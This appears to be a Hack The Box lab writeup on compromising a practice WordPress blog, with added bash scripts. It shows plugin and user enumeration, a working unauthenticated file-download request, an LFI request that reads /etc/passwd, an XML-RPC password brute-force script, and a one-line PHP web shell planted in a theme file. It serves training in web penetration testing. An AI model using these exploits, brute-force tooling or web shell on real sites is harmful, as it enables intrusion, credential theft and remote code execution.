WordPress Hacking [Skill Assessment] - Hack The Box Writeup

Jun Takemura · December 15, 2024

Question 1

Task: Identify the WordPress version number.

Since I couldn't reach the blog right away, because multiple domains share the same IP (name-based virtual hosting), I added an /etc/hosts entry for the virtual host:

sudo cp /etc/hosts /etc/hosts.bak
sudo bash -c 'echo "10.129.2.37 blog.inlanefreight.local" >> /etc/hosts'

Before appending I always take a backup, because if you accidentally use > instead of >> it will overwrite the entire file. You can of course use a text editor instead.

Upon examining the source code, I found the version was 5.1.6.

Or you could run this:

curl -s -X GET 'http://blog.inlanefreight.local' | grep '<meta name="generator"'

Question 2

Task: Identify the WordPress theme in use.

You can examine the source code directly, but the theme was hard to pick out by eye, so I ran this command:

curl -s -X GET http://blog.inlanefreight.local | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/themes/*' | cut -d"'" -f2

I found the theme twentynineteen.

Question 3

Task: Submit the contents of the flag file in the directory with directory listing enabled.

I tried a directory listing on the theme directory I had found:

curl -X GET http://blog.inlanefreight.local/wp-content/themes/twentynineteen -L | html2text

but it didn’t show anything.

So I enumerated plugins:

curl -s -X GET http://blog.inlanefreight.local | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2

Output:

http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/css/common-skeleton.min.css?ver=4.12.3
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/css/tooltip.min.css?ver=4.12.3
http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/css/email-subscribers-public.css
http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/icon-library/fonts/FontAwesome/FontAwesome.css?ver=4.3
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/css/general.min.css?ver=1.1.1
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/css/animate/animate.min.css?ver=5.1.6
http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/js/email-subscribers-public.js
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/sed_app_site.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/site-editor/assets/js/livequery/jquery.livequery.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/site-editor/assets/js/livequery/sed.livequery.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/animate/wow.min.js?ver=1.0.2
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/parallax/jquery.parallax.min.js?ver=1.1.3
http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/js/render.min.js?ver=1.0.0
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-before.js
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-after.js
http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/modules/row/js/row.js?ver=1.0.0

Targeted the plugin ‘email-subscribers’:

curl -s -X GET http://blog.inlanefreight.local/wp-content/plugins/email-subscribers -L | html2text

This gave me a list of directories but I couldn’t find flag.txt there.

Since manual enumeration is time-consuming, I used wpscan:

wpscan --url http://blog.inlanefreight.local -e vp --no-banner

I found directory indexing is enabled on http://blog.inlanefreight.local/wp-content/uploads/ and ran:

curl -s -X GET http://blog.inlanefreight.local/wp-content/uploads/ -L | html2text

and found the flag.
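The enumeration of Questions 1 to 3 (generator tag, theme and plugin slugs from asset URLs, the readme.txt Stable tag used later, and the directory-listing check) as reusable shell functions. This is an added example, not code from the writeup: the function names are mine, the HTML page and index page it runs on are constructed samples rather than captured responses, and the listing check assumes the "Index of /" title that Apache and nginx autoindex pages carry.

```bash
#!/usr/bin/env bash
# Added example, not code from the original writeup: the enumeration steps of
# Questions 1-3 as reusable functions. Each parser reads a response body on
# stdin so it can be exercised offline on the constructed samples below; the
# wp_enum function at the end runs the same parsers against a live target.
set -eu

# Question 1: core version from <meta name="generator" content="WordPress x.y.z" />
wp_version() {
  sed -n 's/.*<meta name="generator" content="WordPress \([0-9][0-9.]*\)".*/\1/p' | head -n 1
}

# Questions 2 and 3: theme or plugin slugs referenced by asset URLs, plus the
# ?ver= query value when present. That value is only a hint: WordPress appends
# its own version (5.1.6 here) when a plugin registers an asset without one.
wp_components() {  # usage: wp_components themes|plugins < page.html
  grep -o "wp-content/$1/[^'\" ]*" | awk -F/ '{
      slug = $3; ver = "-"
      if (match($0, /[?&]ver=[^&]+/)) ver = substr($0, RSTART + 5, RLENGTH - 5)
      print slug, ver
    }' | sort -u
}

# Questions 5 and 6: plugin version from readme.txt ("Stable tag: 4.2.2"; CRLF tolerated)
wp_stable_tag() {
  tr -d '\r' | sed -n -E 's/^[Ss]table [Tt]ag:[[:space:]]*([^[:space:]]+).*/\1/p' | head -n 1
}

# Question 3: does a response body look like an Apache/nginx autoindex page? (assumption)
is_dir_listing() {
  grep -qi '<title>Index of /'
}

# Entries of an autoindex page, without the parent link and Apache's sort links.
dir_listing_entries() {
  grep -o 'href="[^"]*"' | sed 's/^href="//; s/"$//' | grep -v -e '^\.\./$' -e '^?' -e '^/' || true
}

# Constructed samples standing in for the live responses (not captured from the target).
sample_page() {
  cat <<'EOF'
<html><head><meta name="generator" content="WordPress 5.1.6" />
<link rel='stylesheet' href='http://blog.inlanefreight.local/wp-content/themes/twentynineteen/style.css?ver=5.1.6' />
<link rel='stylesheet' href='http://blog.inlanefreight.local/wp-content/plugins/site-editor/framework/assets/css/general.min.css?ver=1.1.1' />
<script src='http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/js/email-subscribers-public.js'></script>
</head><body></body></html>
EOF
}
sample_index() {
  cat <<'EOF'
<html><head><title>Index of /wp-content/uploads</title></head><body>
<a href="?C=N;O=D">Name</a> <a href="/wp-content/">Parent Directory</a>
<a href="2021/">2021/</a> <a href="flag.txt">flag.txt</a>
</body></html>
EOF
}

# Live use (needs the target; not exercised offline): version, theme, plugins with
# their readme Stable tag, and a directory-listing check on each plugin folder.
wp_enum() {  # usage: wp_enum http://blog.inlanefreight.local
  local base page slug ver tag
  base="$1"
  page="$(curl -s "$base/")"
  printf 'WordPress %s\n' "$(printf '%s' "$page" | wp_version)"
  printf '%s' "$page" | wp_components themes | sed 's/^/theme: /'
  printf '%s' "$page" | wp_components plugins | while read -r slug ver; do
    tag="$(curl -s "$base/wp-content/plugins/$slug/readme.txt" | wp_stable_tag)"
    printf 'plugin: %s (ver hint %s, stable tag %s)\n' "$slug" "$ver" "${tag:--}"
    curl -s "$base/wp-content/plugins/$slug/" | is_dir_listing &&
      printf '  directory listing enabled on /wp-content/plugins/%s/\n' "$slug"
  done
}

# Offline demonstration on the constructed samples
sample_page | wp_version
sample_page | wp_components plugins
sample_index | dir_listing_entries
```

Against the lab, `wp_enum http://blog.inlanefreight.local` prints the same facts the questions ask for; note that a ?ver= hint and the readme Stable tag can disagree, and only the readme (or the plugin's main PHP header) is authoritative.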

Question 4

Task: Identify the only non-admin WordPress user.

wpscan:

wpscan --url http://blog.inlanefreight.local -e u

wpscan found two users besides admin, erika and Charlie Wiggins. The output doesn't say whether erika is an admin or not, but you can assume Charlie Wiggins is the expected answer, since the answer format asks for a full name (a name with a space is a display name, which wpscan picks up from author archives, not a login name).

Question 5

Task: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

You could run this wpscan but it’ll take long:

wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 50

Since I had already listed the plugins in Question 3 and confirmed that directory indexing is enabled on email-subscribers/, I went straight to http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/readme.txt and found that its version is 4.2.2.

Search for vulnerabilities:

searchsploit email subscribers 4.2.2

Found an unauthenticated file download vulnerability:

WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download | php/webapps/48698.txt

Download the file and inspect it:

searchsploit -m php/webapps/48698.txt

Run the request as described in the exploit (the report download handler does not require a login, which is the whole vulnerability):

curl 'http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all'

Found the flag.

Question 6

Task: What is the version number of the plugin vulnerable to an LFI?

From the plugin enumeration output in Question 3 there are two other plugins, site-editor and the-events-calendar. Fetching http://blog.inlanefreight.local/wp-content/plugins/site-editor/readme.txt shows that Site Editor is version 1.1.1 (look for the "Stable tag" line; the ?ver=1.1.1 on its general.min.css in the earlier listing already hinted at it). Exploit-DB lists an LFI vulnerability for this version.

Question 7

Task: Use the LFI to identify a system user whose name starts with the letter “f”.

Exploit it. Quote the URL so the shell does not treat the ? as a glob, and anchor the grep so that only usernames starting with f match (a bare grep f would also return lines that merely contain an f, such as accounts with a /bin/false shell):

curl -s 'http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd' | grep '^f'

I found frank.mclane:x:1002:1002::/home/frank.mclane:/bin/bash.
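An added example (not from the writeup) for the LFI step: building the ajax_path request and filtering /etc/passwd for real accounts rather than grepping for a letter. The function names, the LFI_SCRIPT constant and the sample passwd file are mine; only the frank.mclane line of the sample comes from the page, the other entries are constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup: wrapping the Site Editor ajax_path read
# and filtering /etc/passwd for real accounts rather than grepping for a letter.
# The parsers read stdin so they run offline on the constructed sample below.
set -eu

LFI_SCRIPT='/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php'

# Build the request URL. ajax_path is handed an absolute path, so no ../ traversal is needed.
lfi_url() {  # usage: lfi_url http://blog.inlanefreight.local /etc/passwd
  printf '%s%s?ajax_path=%s' "$1" "$LFI_SCRIPT" "$2"
}

# Fetch a file through the LFI (needs the target; not run offline).
lfi_fetch() { curl -s "$(lfi_url "$1" "$2")"; }

# A genuine /etc/passwd starts with the root entry; use this to confirm the include worked.
is_passwd() { grep -q '^root:x:0:0:'; }

# Human accounts: uid >= 1000 (Debian/Ubuntu convention), not nobody, with a login shell.
passwd_users() {
  awk -F: '$3 >= 1000 && $3 != 65534 && $7 !~ /(nologin|false)$/ { print $1 }'
}

# Names starting with a given letter. The ^ anchor is what a plain "grep f" lacks:
# unanchored, it matches any line containing an f anywhere, e.g. a /bin/false shell.
users_starting_with() {  # usage: users_starting_with f < passwd
  passwd_users | grep "^$1" || true
}

# Constructed sample (only the frank.mclane line is from the writeup).
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
fake:x:1001:1001::/home/fake:/bin/false
frank.mclane:x:1002:1002::/home/frank.mclane:/bin/bash
erika:x:1003:1003::/home/erika:/bin/bash
EOF
}

# Offline run; against the target replace sample_passwd with:
#   lfi_fetch http://blog.inlanefreight.local /etc/passwd
sample_passwd | is_passwd && sample_passwd | users_starting_with f
```

The is_passwd check matters in practice: an LFI that fails (wrong path, open_basedir, a WAF) often still returns HTTP 200 with the plugin's own output, so test for the root entry before trusting the grep result.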

Question 8

Task: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

Crack erika’s password:

wpscan --password-attack xmlrpc -t 50 -U erika -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local --no-banner --no-update

WordPress 5.1.6 has the REST API, but that does not turn off xmlrpc.php; it stays enabled unless an administrator disables it, and it was not disabled here, so the password attack could go through XML-RPC.
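What --password-attack xmlrpc actually sends, as an added example; this is neither wpscan's code nor the writeup's. wp.getUsersBlogs authenticates with a username and password, and system.multicall lets one POST carry many attempts (the writeup's xmlrpc mode sends one call per password; wpscan's separate xmlrpc-multicall mode batches them the way xmlrpc_multicall_body does). Function names are mine and the two response bodies at the bottom are constructed in the shape WordPress returns, not captured from the target.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup and not wpscan's code: what an XML-RPC
# password attack sends. wp.getUsersBlogs authenticates with a username and
# password, and system.multicall lets one POST carry many attempts.
set -eu

# Escape XML metacharacters so a password such as a<b&c cannot break the request.
xml_escape() {
  printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g' -e 's/"/\&quot;/g' -e "s/'/\&apos;/g"
}

# Is XML-RPC reachable and does it offer the login-bearing method? (needs the target)
xmlrpc_enabled() {  # usage: xmlrpc_enabled http://blog.inlanefreight.local
  curl -s -X POST -H 'Content-Type: text/xml' \
    --data '<methodCall><methodName>system.listMethods</methodName></methodCall>' "$1/xmlrpc.php" |
    grep -q '<string>wp.getUsersBlogs</string>'
}

# One login attempt.
xmlrpc_login_body() {  # usage: xmlrpc_login_body user pass
  printf '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>' \
    "$(xml_escape "$1")" "$(xml_escape "$2")"
}

# Many attempts in one request: passwords on stdin, one per line.
xmlrpc_multicall_body() {  # usage: xmlrpc_multicall_body user < wordlist
  local user pass
  user="$(xml_escape "$1")"
  printf '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data>'
  while IFS= read -r pass; do
    printf '<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><string>%s</string></value><value><string>%s</string></value></data></array></value></member></struct></value>' \
      "$user" "$(xml_escape "$pass")"
  done
  printf '</data></array></value></param></params></methodCall>'
}

# Classify a single-call response: a valid login returns the user's blogs (isAdmin,
# url, blogid, ...), a bad one returns a fault with faultCode 403.
xmlrpc_login_result() {  # prints ok | fail | unknown; response body on stdin
  local body
  body="$(cat)"
  case "$body" in
    *'<name>isAdmin</name>'*) echo ok ;;
    *'<name>faultCode</name>'*) echo fail ;;
    *) echo unknown ;;
  esac
}

# Send a single attempt (needs the target).
xmlrpc_try() {  # usage: xmlrpc_try http://blog.inlanefreight.local erika password
  xmlrpc_login_body "$2" "$3" |
    curl -s -X POST -H 'Content-Type: text/xml' --data-binary @- "$1/xmlrpc.php" |
    xmlrpc_login_result
}

# Constructed responses in the shape WordPress returns (not captured from the target).
sample_fault() {
  printf '<?xml version="1.0"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>403</int></value></member><member><name>faultString</name><value><string>Incorrect username or password.</string></value></member></struct></value></fault></methodResponse>'
}
sample_success() {
  printf '<?xml version="1.0"?><methodResponse><params><param><value><array><data><value><struct><member><name>isAdmin</name><value><boolean>1</boolean></value></member><member><name>url</name><value><string>http://blog.inlanefreight.local/</string></value></member></struct></value></data></array></value></param></params></methodResponse>'
}

# Offline demonstration
printf 'password\nletmein\n' | xmlrpc_multicall_body erika; echo
sample_fault | xmlrpc_login_result
```

On the defensive side this is why the caveat above matters: login-protection plugins that only watch wp-login.php never see these attempts, and the multicall variant makes one request look like one login. Disabling XML-RPC when nothing needs it (the xmlrpc_enabled filter, or blocking xmlrpc.php at the web server) closes both paths.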

Log in as erika and add web shell code to one of the theme PHP files (the theme editor under Appearance will do):

<?php system($_GET['cmd']); ?>

Requesting http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/erika/d0ecaeee3a61e7dd23e0e5e4a67d603c_flag.txt returned the flag. twentyseventeen is not the active theme (Question 2 found twentynineteen), but theme files are reachable directly by path, so the edited 404.php still executes.
